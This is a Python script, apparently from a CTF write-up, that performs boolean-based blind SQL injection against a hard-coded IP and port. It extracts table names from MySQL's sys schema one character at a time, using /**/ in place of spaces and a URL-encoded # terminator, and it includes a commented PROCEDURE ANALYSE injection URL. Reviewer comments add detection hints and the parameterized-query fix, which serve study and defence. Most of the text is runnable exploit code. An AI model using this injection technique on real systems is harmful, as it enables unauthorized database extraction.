#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
"""Boolean-based blind SQL injection extractor (CTF write-up script).

Recovers the result of ``payload`` one character at a time: for each
position ``i`` it tries every character in ``alpa`` and treats the marker
string ``admin666`` appearing in the HTTP response as "the guess was
right".  Everything is hard-coded to the single CTF host in ``host``.

From a defender's point of view the traffic is easy to spot in access
logs: one GET per guess (up to 99 positions x 62 guesses), each carrying
``substr((SELECT ...))`` in the ``id`` parameter with every space replaced
by ``/**/`` and a ``%23`` (``#``) terminator.  Parameterized queries remove
the underlying flaw; the ``/**/`` and ``%23`` tokens are the kind of thing
a WAF rule or log alert can key on.

NOTE(review): the original file reached us with its line structure
collapsed; the indentation below (in particular the placement of
``t.sleep`` inside the inner loop) is reconstructed from the token order.
"""

import requests as req
import time as t
import base64 as b   # NOTE(review): never referenced below
import string

# Guess alphabet: ASCII letters and digits only.  A result character that is
# not in this set has no matching guess, so its position is never filled.
alpa = string.ascii_letters + string.digits
# Characters recovered so far, in order.
res = ''

# Database name (found with the limit-clause injection linked below): sqlidb
# http://183.129.189.60:10004/?id=1%27limit/**/1,1/**/PROCEDURE/**/ANALYSE(1)%23

# Table name: flllaaaggg
# Query whose first row is extracted below; sys.x$schema_flattened_keys is a
# view of MySQL's ``sys`` schema.
payload = '''SELECT group_concat(table_name) FROM sys.x$schema_flattened_keys WHERE table_schema='sqlidb' GROUP BY table_name limit 0,1'''

# Position loop: at most 99 characters are recovered (range stops before 100).
for i in range(1,100):
    for char in alpa:
        # Injected condition: compare the i-th character of the payload's
        # result with the current guess.  Spaces in the payload are replaced
        # by ``/**/``; ``%23`` is a URL-encoded ``#``.
        host = '''http://183.129.189.60:10004/?id=1'=(substr(({payload}),{i},1)='{char}')%23'''.format(payload=payload.replace(' ','/**/'), i=i, char=char)
        r = req.get(host)
        # Presumably the page shows this marker only when the injected
        # condition is true -- verify against the target's normal response.
        if r'admin666' in r.text:
            res += char
            print("found it: "+res)
            break
        # Throttle: 0.2 s between consecutive guesses.
        t.sleep(0.2)